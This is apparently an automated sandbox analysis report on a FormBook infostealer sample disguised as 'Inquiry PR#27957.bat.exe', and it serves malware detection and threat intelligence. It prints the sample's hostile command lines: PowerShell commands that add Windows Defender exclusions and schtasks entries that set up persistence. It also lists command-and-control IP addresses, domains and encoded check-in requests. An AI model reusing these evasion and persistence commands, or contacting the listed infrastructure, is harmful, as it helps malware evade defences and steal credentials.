Windows Analysis Report
Inquiry PR#27957.bat.exe

Overview

General Information

Sample name:Inquiry PR#27957.bat.exe
Analysis ID:1470000
MD5:9972524538c9f43a23ad683da0a1a97a
SHA1:4fe56974a8a9db66fb9026b0c817a84111cb834b
SHA256:499ef83eee9cef5efa3dfc22fc88a6962289722a65626ec1630721e930784287
Tags:exe
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Scheduled temp file as task from temp location
Snort IDS alert for network traffic
Yara detected AntiVM3
Yara detected FormBook
.NET source code contains potential unpacker
.NET source code contains very large array initializations
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Allocates memory in foreign processes
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Loading BitLocker PowerShell Module
Machine Learning detection for dropped file
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Powershell Defender Exclusion
Sigma detected: Suspicious Add Scheduled Task Parent
Sigma detected: Suspicious Schtasks From Env Var Folder
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • Inquiry PR#27957.bat.exe (PID: 5748 cmdline: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe" MD5: 9972524538C9F43A23AD683DA0A1A97A)
    • powershell.exe (PID: 7224 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7244 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • powershell.exe (PID: 7280 cmdline: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\fuqwoDzun.exe" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
      • conhost.exe (PID: 7296 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • WmiPrvSE.exe (PID: 7608 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)
    • schtasks.exe (PID: 7316 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7336 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7488 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • TsdBVAGjsKVoi.exe (PID: 6336 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 7916 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • TsdBVAGjsKVoi.exe (PID: 5488 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
          • firefox.exe (PID: 7228 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • fuqwoDzun.exe (PID: 7596 cmdline: C:\Users\user\AppData\Roaming\fuqwoDzun.exe MD5: 9972524538C9F43A23AD683DA0A1A97A)
    • schtasks.exe (PID: 7732 cmdline: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp" MD5: 48C2FE20575769DE916F48EF0676A965)
      • conhost.exe (PID: 7740 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • RegSvcs.exe (PID: 7776 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94)
      • TsdBVAGjsKVoi.exe (PID: 6564 cmdline: "C:\Program Files (x86)\SDDPJiXUPzoAsDChIXKpMdIPemqMqdXjbMOdLWKqeNdOBElKx\TsdBVAGjsKVoi.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • sfc.exe (PID: 8088 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
  • cleanup
No configs have been found
Source | Rule | Description | Author | Strings
00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2b6b0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x141ff:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security

Source | Rule | Description | Author | Strings
9.2.RegSvcs.exe.400000.0.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.RegSvcs.exe.400000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2dca3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x167f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
9.2.RegSvcs.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
9.2.RegSvcs.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x2eaa3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x175f2:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ProcessId: 7224, ProcessName: powershell.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, ParentImage: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, ParentProcessId: 7596, ParentProcessName: fuqwoDzun.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp40A9.tmp", ProcessId: 7732, ProcessName: schtasks.exe
            Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", ProcessId: 7316, ProcessName: schtasks.exe
            Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ProcessId: 7224, ProcessName: powershell.exe

            Persistence and Installation Behavior

            Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", CommandLine|base64offset|contains: *j, Image: C:\Windows\SysWOW64\schtasks.exe, NewProcessName: C:\Windows\SysWOW64\schtasks.exe, OriginalFileName: C:\Windows\SysWOW64\schtasks.exe, ParentCommandLine: "C:\Users\user\Desktop\Inquiry PR#27957.bat.exe", ParentImage: C:\Users\user\Desktop\Inquiry PR#27957.bat.exe, ParentProcessId: 5748, ParentProcessName: Inquiry PR#27957.bat.exe, ProcessCommandLine: "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\fuqwoDzun" /XML "C:\Users\user\AppData\Local\Temp\tmp2C94.tmp", ProcessId: 7316, ProcessName: schtasks.exe
            AV Detection

            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, ReversingLabs: Detection: 34%
            Source: Inquiry PR#27957.bat.exe, ReversingLabs: Detection: 34%
            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 9.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000009.00000002.1645996592.00000000015A0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1645343377.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788281912.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3788326451.0000000002FA0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000010.00000002.3788150976.0000000003C10000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000015.00000002.3791731697.00000000050A0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000011.00000002.3785830120.0000000000A50000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000013.00000002.1956019902.0000000000C90000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000009.00000002.1647315768.0000000002340000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000012.00000002.3788370711.00000000043B0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 0000000E.00000002.1858896914.0000000003320000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Submitted Sample, Integrated Neural Analysis Model: Matched 100.0% probability
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exe, Joe Sandbox ML: detected
            Source: Inquiry PR#27957.bat.exe, Joe Sandbox ML: detected
            Source: Inquiry PR#27957.bat.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
            Source: Inquiry PR#27957.bat.exe, Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TsdBVAGjsKVoi.exe, 00000010.00000002.3785830920.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000000.1710209897.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp, TsdBVAGjsKVoi.exe, 00000015.00000002.3785833047.00000000005CE000.00000002.00000001.01000000.0000000E.sdmp
            Source: Binary string: wntdll.pdbUGP source: RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: RegSvcs.exe, RegSvcs.exe, 00000009.00000002.1646176772.00000000015F0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.00000000031C0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1646138502.0000000002E57000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000003.1654535564.000000000300D000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000011.00000002.3788787440.000000000335E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.00000000035B0000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1856891406.000000000325A000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000003.1864671639.0000000003400000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 00000013.00000002.1956648404.000000000374E000.00000040.00001000.00020000.00000000.sdmp
            Source: Binary string: sfc.pdb source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: sfc.pdbGCTL source: RegSvcs.exe, 00000009.00000002.1645624396.0000000001198000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000E.00000002.1856939303.0000000000E17000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000010.00000003.1875454524.000000000164B000.00000004.00000020.00020000.00000000.sdmp, TsdBVAGjsKVoi.exe, 00000012.00000002.3787189728.00000000008B7000.00000004.00000020.00020000.00000000.sdmp
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348729
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_073486A0
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_0734875D
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348C51
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348A73
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_07348906
            Source: C:\Users\user\Desktop\Inquiry PR#27957.bat.exeCode function: 4x nop then jmp 073490EEh0_2_0734884E
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917890
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917919
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917E41
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917C67
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917AF6
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_06917A3E
            Source: C:\Users\user\AppData\Roaming\fuqwoDzun.exeCode function: 4x nop then jmp 069182DEh10_2_0691794D

            Networking

            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49715 -> 142.250.185.211:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49716 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49717 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49719 -> 103.42.108.46:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49720 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49721 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49723 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49724 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49725 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49727 -> 134.122.138.60:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49728 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49729 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49731 -> 35.212.86.52:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49732 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49733 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49735 -> 188.114.97.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49736 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49737 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49739 -> 188.114.96.3:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49740 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49741 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49743 -> 154.12.34.252:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49744 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49745 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49747 -> 162.254.38.56:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49748 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49749 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49751 -> 5.252.229.221:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49752 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49753 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49755 -> 142.250.185.147:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49756 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49757 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49759 -> 185.181.104.242:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49760 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49761 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49763 -> 38.145.202.186:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49764 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49765 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49767 -> 94.130.217.114:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49768 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855464 ETPRO TROJAN FormBook CnC Checkin (POST) M3 192.168.2.9:49769 -> 84.32.84.32:80
            Source: TrafficSnort IDS: 2855465 ETPRO TROJAN FormBook CnC Checkin (GET) M2 192.168.2.9:49771 -> 84.32.84.32:80
            Source: DNS query: www.u9games.xyz
            Source: DNS query: www.globaltrend.xyz
            Source: DNS query: www.ffi07s.xyz
            Source: DNS query: www.j51a.xyz
            Source: Joe Sandbox ViewIP Address: 188.114.97.3 188.114.97.3
            Source: Joe Sandbox ViewIP Address: 188.114.96.3 188.114.96.3
            Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
            Source: Joe Sandbox ViewASN Name: LHPL LHPL
            Source: Joe Sandbox ViewASN Name: SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU SYNERGYWHOLESALE-APSYNERGYWHOLESALEPTYLTDAU
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /5p8u/?GJtTF=-FH8yJw&lv-=BWPzmKqqe8/bm9Y7L5+Meub8zzKE0bi08FFPHLb+gDk5IVms6Q4x1dlGioX/f7BYVBQYq1+WtKZplIRrH9tE8oduNyVeBv0iNKG92SjPfl0JtCvCvw== HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.u9games.xyzConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
            Source: global trafficHTTP traffic detected: GET /la5g/?lv-=1PPV6OmQtv6ujzxmde6xwEMvtAHXmjw0ET0xU8GpAjXY4BrLKK8c6E8QLqBoUjQmvUIqtY3TT4ZQ1NARuPdgqw8nEMVyZqzJ1NN5IW2O5lnTqqMxQQ==&GJtTF=-FH8yJw HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-US,en;q=0.5Host: www.dtalengineering.comConnection: closeUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
